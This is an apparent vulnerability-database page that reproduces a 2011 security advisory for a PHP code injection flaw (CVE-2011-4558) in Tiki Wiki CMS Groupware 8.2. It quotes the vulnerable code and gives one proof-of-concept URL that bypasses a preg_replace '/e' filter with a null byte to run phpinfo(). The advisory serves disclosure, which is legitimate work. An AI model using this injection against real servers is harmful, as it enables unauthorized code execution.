Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Tiki Wiki CMS Groupware 8.2 - 'snarf_ajax.php' Remote PHP Code Injection

🗓️ 22 Dec 2011 00:00:00Reported by EgiXType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 38 Views

Tiki Wiki CMS Groupware 8.2 - 'snarf_ajax.php' Remote PHP Code Injection vulnerability disclosure and exploitatio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Injection
22 Dec 201100:00
zdt
Circl		CVE-2011-4558
27 Jan 202018:34
circl
CVE		CVE-2011-4558
27 Jan 202014:40
cve
Cvelist		CVE-2011-4558
27 Jan 202014:40
cvelist
Dsquare		Tiki Wiki CMS Groupware 8.2 RCE
26 Jan 201200:00
dsquare
EUVD		EUVD-2011-4484
7 Oct 202500:30
euvd
exploitpack		Tiki Wiki CMS Groupware 8.2 - snarf_ajax.php Remote PHP Code Injection
22 Dec 201100:00
exploitpack
NVD		CVE-2011-4558
27 Jan 202015:15
nvd
Packet Storm		Tiki Wiki CMS Groupware 8.2 Code Injection
23 Dec 201100:00
packetstorm
Prion		Input validation
27 Jan 202015:15
prion
Rows per page
  -------------------------------------------------------------------------
  Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Code Injection
  -------------------------------------------------------------------------
  
  author...........: Egidio Romano aka EgiX
  mail.............: n0b0d13s[at]gmail[dot]com
  software link....: http://info.tiki.org/
  
  
  [-] Vulnerability explanation:
  
  The vulnerable code is located into /lib/wiki-plugins/wikiplugin_snarf.php:
  
  170.   // If the user specified a more specialized regex
  171.   if ( isset($params['regex']) && isset($params['regexres']) && preg_match('/^(.)(.)+\1[^e]*$/', $params['regex']) ) {
  172.      $snarf = preg_replace( $params['regex'], $params['regexres'], $snarf );
  173.   }
  
  input passed through $_REQUEST['regex'] is checked by a regular expression at line 171 to prevent
  execution of arbitrary PHP code using the  'e'  modifier in a call to preg_replace() at line 172.
  But  this  check  could  be  bypassed  with a  null byte injection,  requesting an URL like this:
  
   http://<hostname>/tiki-8.2/snarf_ajax.php?url=1&regexres=phpinfo()&regex=//e%00/
  
  Tiki internal filters remove  all null bytes  from user input,  but for some strange reason  this
  doesn't  happen within admin sessions. So, successful exploitation of this vulnerability requires
  an user account with  administration  rights and  'PluginSnarf'  to be enabled  (not by default).
  
  
  [-] Disclosure timeline:
  
  [23/11/2011] - Vulnerability discovered
  [24/11/2011] - Issue reported to security(at)tikiwiki.org
  [24/11/2011] - New ticket opened: http://dev.tiki.org/item4059
  [27/11/2011] - Vendor confirmed the issue
  [27/11/2011] - CVE number requested
  [28/11/2011] - Assigned CVE-2011-4558
  [22/12/2011] - After four weeks still no fix released
  [23/12/2011] - Public disclosure

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Dec 2011 00:00Current
7High risk
Vulners AI Score7
CVSS 26
CVSS 3.17.2
EPSS0.03229
tiki wiki cms groupwareremote php code injectionvulnerabilityegixremote exploitregular expressionadmin sessioncve-2011-4558security disclosure
38